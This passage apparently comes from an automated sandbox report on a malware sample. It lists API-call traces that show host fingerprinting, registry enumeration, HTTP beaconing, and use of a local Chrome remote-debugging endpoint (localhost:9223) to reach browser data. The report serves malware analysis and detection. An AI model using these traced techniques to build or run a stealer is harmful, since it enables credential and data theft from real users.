                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC2C), ref: 008E1330
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC30), ref: 008E133E
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC34), ref: 008E134C
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC38), ref: 008E135A
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0091BC3C), ref: 008E1368
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E1375), ref: 008F28ED
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: RtlAllocateHeap.NTDLL(00000000), ref: 008F28F4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28E1: GetComputerNameA.KERNEL32(00000000,008E1375), ref: 008F2908
                                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 008E13D3
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2891980384-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 08b5f5bad9015897fd0121711224b9ca8dfd37d5b06f650144e41426260c5a0b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 33fd7d3380eb53e115463a8501598a4969be3efad0e6989f36a76e4bc1eeb5c1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08b5f5bad9015897fd0121711224b9ca8dfd37d5b06f650144e41426260c5a0b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D4191B1F0426C66CF20DBB58C09BEB7BADEF55354F500992A5C9E3181DB749AC48B90
                                                                                                                                                                                                                                                                                                                    Function 008F2E5F Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,00917816,00000000,?,?), ref: 008F2ECF
                                                                                                                                                                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 008F2F0C
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F2F39
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 008F2F58
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 008F2F8E
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008F2FA3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00917E28), ref: 008F3038
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 008F30A2
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 008F30C2
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 008F30CE
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                                                                    • API String ID: 2394436309-3278919252
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c516e29983ae48a88d206803b4e04c6628e5c2604084274c538d4a5247bf6ad3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6d347a287c43e7c34359e8777542a07fab4d39920256db95243342b759455d07
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c516e29983ae48a88d206803b4e04c6628e5c2604084274c538d4a5247bf6ad3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A761B77590012CAAEB21DB65DD84EDABBB8FB45304F1046E6A608E3121DF706FC6CF54
                                                                                                                                                                                                                                                                                                                    Function 008E7E0E Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 122networkCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 008E7E3C
                                                                                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9223/json,00000000,00000000,80000000,00000000), ref: 008E7E6F
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 008E7E7C
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Internet$Open$CloseHandle
                                                                                                                                                                                                                                                                                                                    • String ID: "webSocketDebuggerUrl":$"ws://$WebSocketClient$http://localhost:9223/json
                                                                                                                                                                                                                                                                                                                    • API String ID: 3289985339-1054772028
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c4c72afe30b3801783e9e4654a16d05b926f05d72bebe499e17f16c5c9c826a2
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8a0690768f7bfe2424b0441af69bf8b53db53877de4d664ce9fa8089a943a5a3
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4c72afe30b3801783e9e4654a16d05b926f05d72bebe499e17f16c5c9c826a2
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9414F71E042ACAFDB219B659C89EEA72BCFB49755F0000E5F748E3141DAB05EC58F61
                                                                                                                                                                                                                                                                                                                    Function 008F25FE Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110memorystringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 008F2631
                                                                                                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008F2671
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 008F26C6
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F26CD
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F2703
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00917DD8), ref: 008F2712
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 008F32FB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: _memset.LIBCMT ref: 008F332A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: lstrcat.KERNEL32(?,00000000), ref: 008F3352
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: lstrcat.KERNEL32(?,00917E68), ref: 008F336F
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008F2729
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F421B: malloc.MSVCRT ref: 008F4220
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F421B: strncpy.MSVCRT ref: 008F4231
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008F274C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$Heap$AllocateCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: :\$C$QuBi
                                                                                                                                                                                                                                                                                                                    • API String ID: 3915896539-239756005
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d2e5848c1fa0caca621f088786d3bfb82ffae34da2c8d80bee3dbce82b5b1dad
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 03627294fd5dcda3e764ce5454acf8bd05a0e9ef53ca3747a06618447f7ad318
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2e5848c1fa0caca621f088786d3bfb82ffae34da2c8d80bee3dbce82b5b1dad
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1416D7194412CABCB25AF789D45AEEBABCFF19300F0000E5F649E3121DA748F918FA5
                                                                                                                                                                                                                                                                                                                    Function 008F8F92 Relevance: 18.1, APIs: 8, Strings: 2, Instructions: 592networksleepCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E13A9), ref: 008F28BB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: RtlAllocateHeap.NTDLL(00000000), ref: 008F28C2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: GetUserNameA.ADVAPI32(00000000,008E13A9), ref: 008F28D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,008F9D6E), ref: 008F9007
                                                                                                                                                                                                                                                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,?,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F9013
                                                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,008F9D6E), ref: 008F9024
                                                                                                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,00917803), ref: 008F9249
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008F9307
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008F931A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 008F2631
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008F2671
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 008F26C6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: RtlAllocateHeap.NTDLL(00000000), ref: 008F26CD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E4A56: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E4AF5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E4A56: StrCmpCA.SHLWAPI(?), ref: 008E4B13
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F56FF: StrCmpCA.SHLWAPI(?,block,?,?,008F9377), ref: 008F5714
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F56FF: ExitProcess.KERNEL32 ref: 008F571F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E5E61: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E5F00
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E5E61: StrCmpCA.SHLWAPI(?), ref: 008E5F1E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F4DE6: strtok_s.MSVCRT ref: 008F4E05
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F4DE6: strtok_s.MSVCRT ref: 008F4E88
                                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 008F96C8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E5E61: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E60B6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E5E61: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 008E60FA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E5E61: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E612C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F4387: SHFileOperation.SHELL32(?), ref: 008F43BD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?,?,?,?), ref: 008F8DB4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: wsprintfA.USER32 ref: 008F8DD5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: FindFirstFileA.KERNEL32(?,?), ref: 008F8DEC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: _mbscmp.MSVCRT ref: 008F8E13
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: _mbscmp.MSVCRT ref: 008F8E2B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: _splitpath.MSVCRT ref: 008F8E66
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: _ismbcupper.MSVCRT ref: 008F8EB3
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 008F97C6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: _memset.LIBCMT ref: 008F9A71
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: _memset.LIBCMT ref: 008F9A80
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 008F9A95
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: ShellExecuteEx.SHELL32(?), ref: 008F9C35
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: _memset.LIBCMT ref: 008F9C44
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: _memset.LIBCMT ref: 008F9C56
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: InternetOpen$Heap_memsetlstrcpy$FileProcess$AllocateCloseCreateDirectoryEventHandleName_mbscmpstrtok_s$ConnectExecuteExitFindFirstFolderHttpInformationModuleOperationOptionPathRequestShellSleepUserVolumeWindows_ismbcupper_splitpathlstrcatlstrlenwsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: 635b5ceb8ed09951eb8d5e776815ad72$abc_
                                                                                                                                                                                                                                                                                                                    • API String ID: 1996436140-1184922013
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2e50a56c4f787283d2189e8b42af533319f07b5b28fe067a50ee2508ecbbbfe0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 10ac9c9b587815fae980373dd3e33c9ddb1cc3c95774d07bc5ef4f13fcda4293
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e50a56c4f787283d2189e8b42af533319f07b5b28fe067a50ee2508ecbbbfe0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E325F729083459BC620FB79C846AAEF7E5FFC1300F51491AF688D7251DB706A498B93
                                                                                                                                                                                                                                                                                                                    Function 008F8615 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E68F1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: StrCmpCA.SHLWAPI(?), ref: 008E690B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E693A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 008E6979
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E69A9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E69B4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008E69D8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8669
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008F8674
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,008F8680,?), ref: 008F3A93
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,?), ref: 008F8689
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008F8698
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008F86B1
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
